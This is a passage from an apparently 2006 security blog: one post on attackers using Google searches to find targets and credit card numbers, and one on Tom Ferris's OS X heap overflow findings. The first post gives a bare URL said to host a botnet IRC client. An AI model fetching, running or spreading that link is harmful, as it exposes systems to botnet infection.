The most interesting comment here is the use of Google to hone the attacks. There is even a book on the market that talks about hacking with google. One of the more novel methods was extracting credit card numbers. Before anyone wonders whether Google gets sued over the random crimes committed by others using Google look no further.

More details found on a forum regarding the make up of this root kit:

 another botnet irc client:
 http://210.3.4.193/cmd.txt

Filed in Vulnerabilities | Comments (0) | Permalink

Latest on OS X research

Monday, May 1, 2006

Tom Ferris, noted security researcher, has listed a series of new bugs to come out for OS X. it’s an interesting mixture of bugs which consists of mostly Heap Overflows. This is scary for those who would like to think that their OS X machine is 100% safe from malware. The media doesn’t always help with alarmist reactions and Apple doesn’t help much with it’s defensive posture. The truth, as is almost always the case, lies in the parallax of the two sources. OS X has received a lot more attention these days and thus more bugs have been found. While the technical underpinnings of OS X *are* in fact more solid then Windows it doesn’t mean that the OS is “virus free” or “immune from hackers/crackers/etc”.

Filed in Vulnerabilities | Comments (0) | Permalink